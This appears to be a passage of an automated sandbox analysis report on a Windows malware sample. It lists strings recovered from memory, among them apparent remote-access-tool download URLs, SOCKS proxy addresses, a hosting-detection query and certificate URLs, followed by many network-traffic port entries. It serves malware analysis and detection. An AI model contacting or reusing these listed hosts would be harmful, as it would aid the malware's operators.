                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.175.31.195:41450w
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.175.31.195:4145://proxyx
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.188.47.132:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.188.47.132:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://artemis-rat.com
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A7D3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AA0C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8CCD3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89897000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8CDCE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C811000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B80A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://batit.aliyun.com/alww.html?id=00000000003887822894
                  Source: MSBuild.exe, 00000002.00000002.3008889130.0000000003024000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3011336947.0000000006200000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3007542836.0000000001372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: MSBuild.exe, 00000002.00000002.3007136998.0000000001280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: MSBuild.exe, 00000002.00000002.3007136998.000000000130C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3008889130.0000000003024000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3011336947.0000000006200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: MSBuild.exe, 00000002.00000002.3007136998.000000000130C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3008889130.0000000003024000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3011336947.0000000006200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crls.pki.goog/gts1p5/ZLjfCcC0tzo.crl0
                  Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3241546046.000001CD87A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?41689dd2934fc
                  Source: MSBuild.exe, 00000002.00000002.3008889130.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: MSBuild.exe, 00000002.00000002.3008889130.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3006802921.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: MSBuild.exe, 00000002.00000002.3007136998.000000000130C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3008889130.0000000003024000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3011336947.0000000006200000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3007542836.0000000001372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/s/gts1p5/4mHaPTRzkCs01
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1p5.der0
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89661000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3008889130.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: MSBuild.exe, 00000002.00000002.3008889130.0000000003024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://terminal4.veeblehosting.com
                  Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A98A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B7C8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A2ED000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C93A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89984000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B4AE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A8BA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B823000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.freecsstemplates.org
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8CB12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.robertnyman.com
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8CB12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.snook.ca/jon;
                  Source: MSBuild.exe, 00000002.00000002.3006802921.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A2B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com/
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B787000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B5A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B54C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B757000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com/get/65ee94bdc904
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89661000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com/get/65ee94bdc9042c7a6dd7e091
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A248000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A7AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com:443
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A1AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com:443/
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B5EB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD897F0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B845000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8CAE5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD898AF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A1AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto&display=swap
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List/blob/master/http.txt
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD898AF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A1AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://globalurl.fortinet.net:8010/XX/YY/ZZ/CI/MGPGHGPGPFGHDDPFGGHGFHBGCHEGPFBGAHAH)
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B35B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ktxcomay.com.vn
                  Source: MSBuild.exe, 00000002.00000002.3007136998.000000000130C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3008889130.0000000003024000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.3011336947.0000000006200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B7DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54898
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53976 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52851 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52002 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53345 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53127 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53576
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51301 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52004
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54854 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53649 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54303
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52701 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53341
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53582
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54230 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54322 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53151 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54941 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53345
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51325 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53585
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54374 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53584
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53469
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53468
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53667 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53473
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54791 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53470
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50403
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50887
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52701
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55148 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50409
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50408
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51299
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54322
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52148
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53576 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52582 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54225 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50411 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52152
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52150
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52152 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53649
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54858
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54372 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55146
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55148
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53126 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55149
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54228 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53341 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53473 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54363 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53582 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54862 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54858 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53158 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53658
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50952 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54862
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50881 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54901 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54490 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50952
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53662
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53667
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54877
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52697
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52148 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52582
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55146 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54940 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52004 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54373 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52847 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50887 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53979 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51299 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53967
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53967 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51998 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54377
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54857 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51301
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50408 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53979
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54940
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53971
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53976
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54944
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54942
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54941
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53469 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52154 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54840 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52848 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51325
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53468 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54377 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54902 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52000 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53584 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54233 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54944 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50425 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54898 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55145 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51792 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53658 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53585 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50419
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53127
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50411
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53126
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
